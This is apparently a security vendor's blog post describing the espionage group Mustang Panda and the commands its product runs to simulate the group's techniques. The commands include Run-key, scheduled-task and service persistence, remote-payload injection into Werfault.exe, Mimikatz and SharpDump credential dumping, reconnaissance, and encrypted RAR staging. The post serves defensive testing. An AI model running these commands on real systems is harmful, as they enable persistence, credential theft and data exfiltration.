Mustang Panda is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. The group has targeted government entities, nonprofits, religious organizations, and other NGOs across the U.S., Europe, Mongolia, Myanmar, Pakistan, Vietnam, and other regions.
Mustang Panda is considered a state-sponsored APT with a focus on long-term intelligence gathering. The group is best known for highly tailored spear-phishing campaigns that leverage geopolitical or local-language lures to deliver multi-stage malware payloads.
Over the years, it has deployed tools such as PlugX, Poison Ivy, Toneshell, Pubload, and newer malware families, including FDMTP and PTSOCKET, designed to evade endpoint defensive mechanisms.
A high-profile case in early 2025 saw the U.S. Department of Justice and French authorities neutralize PlugX infections placed by Mustang Panda on over 4,200 devices via malicious USB drives, underscoring the group’s global reach and evolving tradecraft.
Mustang Panda is known to deliver spearphishing attachments that masquerade as legitimate documents.
In particular, they often abuse Windows LNK (shortcut) files by disguising them as benign Word documents or PDFs. Once a user opens the attachment, the LNK file executes commands that launch malicious binaries while maintaining the appearance of a trusted file.
This method allows attackers to bypass user suspicion and initiate the infection chain without requiring macros or scripts. The tactic has been observed in multiple Mustang Panda campaigns targeting government and NGO entities.
How Does Picus Simulate This Behavior?
Picus simulates this execution flow to validate whether security controls can detect and prevent it. The simulation replicates the adversary’s behavior by triggering the following process chain:
|
# Process 1 # This simulates a user opening a malicious attachment that appears to be a Word document but is actually an LNK file. # Process 2 # The masqueraded LNK file then spawns a benign Windows binary (in this case, winver.exe) as a decoy, mimicking Mustang Panda’s use of trusted executables to reduce detection. |
Mustang Panda has also been observed leveraging Msiexec.exe, a legitimate Windows Installer utility, to deliver and execute malicious payloads. By abusing this signed binary, attackers gain two key advantages:
In Mustang Panda campaigns, Msiexec abuse is often tied to lateral movement and persistence, where adversaries execute crafted commands to drop and run malicious DLLs or executables under the guise of legitimate software installation.
How Does Picus Simulate This Behavior?
Picus simulates this execution flow to validate whether defenses detect and respond when Msiexec.exe is abused:
|
msiexec.exe /q /i "%TMP%\in.sys" |
This simulation reproduces the attacker technique in a safe, controlled manner to check if EDR, AV, and detection rules trigger on Msiexec misuse.
Mustang Panda is also known to abuse the DLL side-loading technique to execute malicious payloads under the cover of legitimate applications. In this technique, adversaries place a malicious DLL in a directory where a trusted application will automatically load it instead of the legitimate library. Because the DLL is executed by a signed and trusted binary, the malicious activity appears to originate from a legitimate process, significantly reducing the chance of detection.
In multiple Mustang Panda campaigns, attackers have side-loaded DLLs into security and system binaries (such as Microsoft Defender components), taking advantage of predictable DLL search order. This enables both stealthy execution and persistence while blending in with normal system operations.
How Does Picus Simulate This Behavior?
Picus recreates this attacker technique to validate whether defenses can detect DLL side-loading abuse:
|
# Process 1 MpDlpCmd.exe # Launches MpDlpCmd.exe (a legitimate Microsoft Defender binary), which is commonly targeted for side-loading attacks due to its trust level. # Process 2 |
Mustang Panda frequently abuses Windows Registry Run keys to establish persistence across system reboots. By creating new entries under the HKLM\Software\Microsoft\Windows\CurrentVersion\Run hive, attackers ensure their payloads automatically execute whenever the system starts.
This method is stealthy because it leverages a native Windows mechanism used by legitimate applications. In observed Mustang Panda campaigns, malicious executables or loaders are registered under deceptive names (e.g., mimicking Microsoft Defender services) to blend into normal startup behavior. Once in place, these keys guarantee reliable execution of attacker-controlled processes without requiring user interaction.
How Does Picus Simulate This Behavior?
Picus simulates the creation of such registry keys to validate whether defenses detect and prevent persistence via registry modification.
|
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v WindowsDefenderUpdater /d "cmstp.exe /s c:\programdata\DefenderService.inf" /f |
This ensures defenders can detect adversaries like Mustang Panda using HKLM Run key abuse to maintain long-term access.
Mustang Panda has been observed abusing Windows Task Scheduler to achieve persistence and repeated execution of malicious code. By creating scheduled tasks that mimic legitimate system processes or services, adversaries ensure their payloads run at defined intervals or on system startup.
This technique blends into normal administrative activity, since schtasks.exe is a trusted Windows utility. Attackers often name tasks deceptively (e.g., “InetlSecurityAssistManager” resembling “Intel Security”) to avoid suspicion during manual inspection. Once created, the scheduled task launches the attacker’s payload on schedule, providing reliable and stealthy persistence.
How Does Picus Simulate This Behavior?
Picus simulates this technique by creating a scheduled task with parameters that mirror adversary tradecraft.
|
schtasks /create /sc MINUTE /tn "InetlSecurityAssistManager" /tr "wscript %TMP%\test.vbs" /mo 10 /F |
This simulation enables defenders to test whether their EDR, SIEM, and Windows event monitoring solutions can detect malicious task creation.
Mustang Panda, like many advanced threat actors, has been observed leveraging Windows services to maintain persistence on compromised systems. By creating a new service that points to a malicious executable or script, adversaries ensure their payload runs with system-level privileges and is automatically executed at startup.
This approach is stealthy and resilient because services are a native mechanism used by Windows and are often trusted by administrators. Attackers typically disguise service names with legitimate-looking identifiers (e.g., security-related terms) to avoid raising suspicion during routine inspections. Once installed, the malicious service guarantees reliable execution, even across reboots.
How Does Picus Simulate This Behavior?
Picus simulates this persistence technique by creating a Windows service configured to execute a malicious command.
|
sc.exe create REG_WINDEF binPath="cmd.exe /c powershell.exe -ep bypass -windowstyle hidden -file \Windows\Temp\REG_WINDEF.ps1" start=Auto |
Mustang Panda has leveraged token manipulation and process injection techniques to escalate privileges and execute malicious code under the context of trusted Windows processes. In this case, the adversary targets Werfault.exe, the Windows Error Reporting process, which runs with elevated trust.
By injecting malicious shellcode into Werfault.exe, attackers achieve several goals:
This technique is powerful because many security tools trust Werfault.exe as a signed Microsoft binary, making injected code harder to detect. Mustang Panda has used similar tradecraft to conceal implants and backdoors within legitimate processes during espionage campaigns.
How Does Picus Simulate This Behavior?
|
# Process 1 notepad.exe # Launches a benign process to simulate the initial foothold before escalation. # Process 2 cmd.exe /c "set PAYLOADURL=%remotefile-1673% && %TMP%\InjectWerfault.exe" # Executes a custom injector (InjectWerfault.exe) that fetches a remote payload (%remotefile-1673%) and attempts to inject it into Werfault.exe. |
This controlled simulation validates whether defenses detect token abuse, process injection attempts, and suspicious child process creation chains.
Mustang Panda, like many advanced threat groups, has been reported using credential dumping techniques to extract usernames and passwords directly from memory. A prime target is the Local Security Authority Subsystem Service (LSASS) process, which stores credential material such as NTLM hashes, Kerberos tickets, and plaintext passwords in certain cases.
By dumping LSASS memory, adversaries can harvest credentials to facilitate lateral movement, privilege escalation, and long-term persistence within enterprise networks. Tools like Mimikatz, ProcDump, and custom variants (such as SharpDump) are commonly used for this purpose. Because LSASS runs with high privileges, compromising it gives attackers access to a wealth of sensitive authentication data.
Mustang Panda has incorporated credential dumping in espionage-focused campaigns to expand access across government and NGO networks, enabling them to maintain stealthy footholds and escalate privileges.
How Does Picus Simulate This Behavior?
Picus simulates this threat by safely executing a credential dumping attempt using a benign SharpDump invocation.
|
%TMP%\SharpDump.exe |
Executes SharpDump, a tool designed to dump the memory of the LSASS process.
In real-world scenarios, this would attempt to read and extract sensitive data, but within the Picus simulation, no actual credential data is accessed or exposed. The purpose is to validate whether security solutions can detect the attempt to access LSASS memory.
Mimikatz is one of the most widely used tools by both nation-state groups and cybercriminals for credential theft. Threat actors such as Mustang Panda have been observed leveraging Mimikatz to dump credentials from memory and extract authentication artifacts.
Mimikatz provides direct access to sensitive material by:
Mustang Panda and similar APT groups often integrate Mimikatz into broader attack chains to pivot quickly inside compromised environments while remaining stealthy, bypassing traditional authentication barriers.
How Does Picus Simulate This Behavior?
Picus safely simulates Mimikatz execution to validate the detection of credential dumping activities without exposing real credentials.
|
%TMP%\mimikatz22020220919x64.exe "privilege::debug" "sekurlsa::logonPasswords" exit |
By testing this behavior, Picus helps ensure defenders can reliably detect adversaries like Mustang Panda when they weaponize Mimikatz to compromise authentication data and move laterally across networks.
Mustang Panda, like many APT groups, routinely performs system and network discovery after initial access. These reconnaissance steps help adversaries map the environment, identify valuable targets, and plan lateral movement. By leveraging native Windows command-line tools, attackers gather details without introducing external binaries, which makes the activity harder to detect.
Typical discovery goals include:
Mustang Panda integrates these simple yet powerful discovery techniques into its campaigns to expand situational awareness before executing further exploitation.
How Does Picus Simulate This Behavior?
|
# Process 1 ipconfig.exe /all # Retrieves full network configuration details, including IP addresses, DNS servers, and adapter settings.
arp -a #Displays the ARP cache to identify other hosts on the local network. # Process 3 route PRINT # Shows routing table entries to reveal available network paths.
systeminfo.exe # Collects OS version, installed updates, and hardware specifications for system profiling. |
Threat actors such as Mustang Panda often perform security software discovery to understand what defenses are present on a compromised host. By enumerating antivirus and endpoint protection solutions, adversaries can adapt their techniques to evade detection, disable defenses, or select payloads most likely to succeed.
One common method is abusing Windows Management Instrumentation (WMI), a powerful administrative interface. Attackers query the root\SecurityCenter2 namespace, which maintains details about installed security products. This provides adversaries with:
Mustang Panda and other APT groups have relied on WMI reconnaissance as part of their pre-exploitation phase, ensuring their malware can operate with minimal interference.
How Does Picus Simulate This Behavior?
Picus replicates this discovery technique by executing a PowerShell command that queries WMI for antivirus product information.
|
powershell.exe -c "Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ErrorAction Stop" |
This simulation safely reproduces attacker behavior without exposing real product configurations.
Adversaries such as Mustang Panda frequently conduct system reconnaissance to learn about available storage devices on compromised machines. By enumerating disk information, attackers can identify:
Using WMIC.exe (Windows Management Instrumentation Command-line), attackers query the logicaldisk class to extract disk details. This method blends into normal administrative activity and avoids introducing third-party tools, making it a stealthy reconnaissance tactic. Mustang Panda and other APT actors have leveraged WMI queries as part of their environment mapping phase before moving on to data theft or persistence operations.
How Does Picus Simulate This Behavior?
Picus simulates this discovery activity by executing a WMIC command that retrieves disk details.
|
wmic.exe logicaldisk get size,freespace,caption |
This safe simulation mimics adversary tradecraft without accessing sensitive files or altering system state. It validates whether EDRs, SIEM rules, and host monitoring can detect suspicious use of WMIC for reconnaissance.
Advanced threat actors such as Mustang Panda often perform Active Directory reconnaissance to understand domain structures, remote systems, and user objects. One widely abused utility is Adfind, a legitimate command-line tool designed for querying Active Directory.
By abusing Adfind, adversaries can:
This reconnaissance enables attackers to map enterprise networks, identify high-value accounts, and prepare for lateral movement and privilege escalation. Mustang Panda has been observed leveraging such domain enumeration tools to support espionage operations against government and private sector targets.
How Does Picus Simulate This Behavior?
Picus simulates this technique by executing a controlled command that mimics how Adfind is weaponized.
|
cmd.exe /c ""%TMP%\sqlceip.exe" -f objectcategory=* > "%TMP%\sqlceip.txt"" |
Adversaries such as Mustang Panda frequently query Windows Event Logs to extract operational intelligence from compromised systems. By enumerating authentication and security-related events, attackers can identify:
The Windows native utility Wevtutil.exe allows adversaries to query event logs directly. In particular, Event ID 4624 (successful logon) provides valuable details on user accounts, logon types, and session origins. This tactic gives attackers insight into which accounts are active and potentially valuable for privilege escalation or credential theft.
How Does Picus Simulate This Behavior?
Picus safely simulates this discovery step by issuing a Wevtutil query.
|
wevtutil.exe qe Security /format:text /q:"Event[System[(EventID=4624)]]" |
Threat groups such as Mustang Panda often employ screen capture techniques to collect sensitive on-screen data from compromised systems. Screenshots can reveal:
Attackers commonly use custom binaries written in .NET to take screenshots and save them locally before exfiltration. This allows them to silently monitor user activity and gather intelligence without directly interacting with files. Screen capture is especially valuable for espionage-focused campaigns, where context is as important as credentials or system data.
Mustang Panda has incorporated such tactics into their malware families to extend surveillance capabilities within targeted organizations.
How Does Picus Simulate This Behavior?
|
# Process 1 ScreenshotCapture.exe # Represents execution of a screenshot utility that captures the desktop display. # Process 2 {predefined-file-search} screenshot.jpg # Simulates saving the captured image as screenshot.jpg in a predefined location, imitating attacker staging before exfiltration. |
Adversaries such as Mustang Panda often deploy keyloggers to silently capture keystrokes from compromised systems. This allows them to harvest:
A common method is abusing the Windows API function GetAsyncKeyState(), which checks the state of keys on a keyboard at any given time. By repeatedly polling this function, a keylogger can record every keystroke without requiring elevated privileges or triggering user-visible alerts.
Keyloggers are a hallmark of espionage operations, giving attackers like Mustang Panda persistent access to sensitive data without needing direct credential dumps or memory scraping.
How Does Picus Simulate This Behavior?
Picus simulates this behavior by executing a benign binary that mimics a keylogger’s use of GetAsyncKeyState().
|
cmd.exe /c C:\Users\Public\getasynckeystate.exe |
This controlled simulation does not capture real keystrokes but reproduces the execution footprint of a keylogger.
Adversaries such as Mustang Panda often prepare data for exfiltration by compressing and encrypting files into archives. This tactic:
Utilities like WinRAR (rar.exe) are frequently abused for this purpose because they are widely available and trusted in enterprise environments. By creating password-protected archives, attackers ensure that sensitive data remains hidden even if intercepted during transfer. Mustang Panda has been observed using encrypted RAR files to stage stolen documents before exfiltration.
How Does Picus Simulate This Behavior?
Picus simulates this activity by safely executing a WinRAR command that creates an encrypted archive.
|
# Process 1 rar.exe a -apC -r -tk -ed -m5 -dh -tl -hpThisIsMySupperPassword -ta20220704 %TMP%\P1CUS4.ldf *.doc *.docx # Process 2 {predefined-file-search} %TMP%\P1CUS4.ldf |
These two processes compress Word documents into a password-protected RAR archive named P1CUS4.ldf in the temporary directory.
The command applies maximum compression, includes subdirectories, and enforces AES-256 encryption with the specified password. To complete the scenario, Picus also triggers a file search for %TMP%\P1CUS4.ldf, mimicking the staging step adversaries take once an archive has been created.
The Picus Security Validation Platform safely simulates Mustang Panda Threat Group’s techniques using its continuously updated Threat Library, identifying blind spots across EDRs, NGFWs, and SIEMs before attackers can exploit them.
You can also test your defenses against hundreds of other Linux malware variants, such as UNC3886, APT31, Melofee malware campaigns within minutes with a 14-day free trial of the Picus Platform.
|
Threat ID |
Threat Name |
Attack Module |
|
91310 |
Mustang Panda Threat Group Campaign |
|
|
34239 |
Mustang Panda Threat Group Campaign Backdoor Malware Download |
|
|
67644 |
Mustang Panda Threat Group Campaign Backdoor Malware Email Threat |
|
|
93720 |
Mustang Panda Threat Group Campaign Malware Dropper Download Threat |
|
|
97124 |
Mustang Panda Threat Group Campaign Malware Dropper Email Threat |